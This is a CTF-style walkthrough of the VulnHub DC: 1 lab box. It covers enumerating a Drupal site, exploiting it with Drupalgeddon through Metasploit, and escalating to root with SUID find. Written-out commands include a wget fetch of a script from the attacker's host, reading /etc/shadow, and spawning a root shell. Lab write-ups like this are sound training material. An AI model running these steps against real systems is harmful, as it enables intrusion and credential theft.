This VulnHub walkthrough is a box called DC: 1. It’s rated as a beginner box and it’s really not too difficult.
We start off by running our typical nmap scan: nmap -sC -sV -v 192.168.136.132 -oN map1
There are a few ports listed here but the most interesting one is port 80. Let’s look at the website.
Ok it’s a Drupal site which confirms what Nmap found. Nmap also noted that the version was 7. Let’s see if we can find a more exact version. I’ll use droopescan: droopscan scan drupal -u 192.168.136.132
It takes a few minutes to run, but it gives us a list of possible versions between 7.22 and 7.26. Let’s see if any exploits exist.
Searchsploit returns a ton of results most of which center around the Drupalgeddon exploits. I successfully exploited the site with three of the exploits: 34992.py, 44449.rb, and a Metasploit module.
For this walkthrough, I’m just going to show the Metasploit route. I’ll have a video walkthrough up soon where I’ll show all three ways. The privilege escalation is the same either way.
So let’s start up Metasploit and search for drupal.
Next, we’ll set the rhosts to the site IP address
Now, we’ll launch the exploit to get a shell.
Now that we have a shell, we can work on privilege escalation. There are a couple ways to discover the path. By running a Linux privilege checker, or by finding a hint (in the form of a flag) on the Drupal site.
I’ll use the checker for this walkthrough. So start up a python web server and use wget to download the file. I also upgraded the shell using python.
python -c ‘import pty; pty.spawn(“/bin/bash”)’
python -m SimpleHTTPServer 80
wget 192.168.136.129/privcheck.py
Then run the checker script.
The hard part about doing it this way is that it’s really easy to miss it. You also might not know that find has an exec flag that lets you run commands on what you find.
The other way to find this would be to get the mysql password form the Drupal config, find the user password hashes, and crack them. That would lead you back to the Drupal site where you could find the hint.
All that to say is that the find command has the suid bit set which will let us execute code as the owner – in this case root.
Let’s test it out.
find /etc/shadow -exec cat {} +
If you only had a webshell at this point, you could crack the password for the flag4 user account and log in with ssh. That’s not necessary to get root or even view the root flag. Find can do all that for us (I’m still using /etc/shadow here because something has to fill the spot. It really doesn’t matter what. An empty text file would work too.)
find /etc/shadow -exec bash \;
Hmmmm … what happened here? We should have been root. Let’s try it again with sh.
Now we’re root! But why didn’t it work with bash? Let’s find out.
So it looks like running bash will actually put you in a restricted bash shell. That’s not the case with sh.
Anyway, we can now go to the root folder and view the flag.
So that was DC: 1 from VulnHub. I hope you enjoyed the walkthrough. I’ll have a video up soon that walks through the other methods to get a shell.
Update: The video can be found here
Happy Hacking!
-R3a50n